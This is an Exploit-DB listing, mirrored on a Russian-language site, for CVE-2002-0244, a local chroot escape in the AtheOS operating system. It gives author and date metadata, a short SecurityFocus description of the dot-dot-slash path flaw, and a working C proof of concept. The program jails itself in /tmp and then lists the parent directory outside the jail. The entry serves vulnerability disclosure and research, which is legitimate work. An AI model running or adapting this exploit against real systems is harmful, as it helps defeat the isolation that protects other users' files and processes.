- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 21282
- Проверка EDB
-
- Пройдено
- Автор
- JEDI/SECTOR
- Тип уязвимости
- LOCAL
- Платформа
- ATHEOS
- CVE
- cve-2002-0244
- Дата публикации
- 2002-02-07
C:
/*
source: https://www.securityfocus.com/bid/4051/info
AtheOS is a freely available, open source operating system. It is distributed under the GPL, and maintained by the AtheOS project.
It is possible to escape change rooted directories on AtheOS. Due to insufficient handling of relative pathes, a process in the change rooted directory may change directory using the dot-dot-slash (../) specifier. This would allow access to the system with the privileges of the change rooted process.
*/
#include <stdio.h>
#include <unistd.h>
#include <dirent.h>
int main(void)
{
register DIR *d;
register const struct dirent *e;
if (chdir("/") || chroot("/tmp") || chdir("/") ||
(d = opendir("..")) == NULL) {
return 1;
}
while ((e = readdir(d)) != NULL) {
puts(e->d_name);
}
return 0;
}- Источник
- www.exploit-db.com
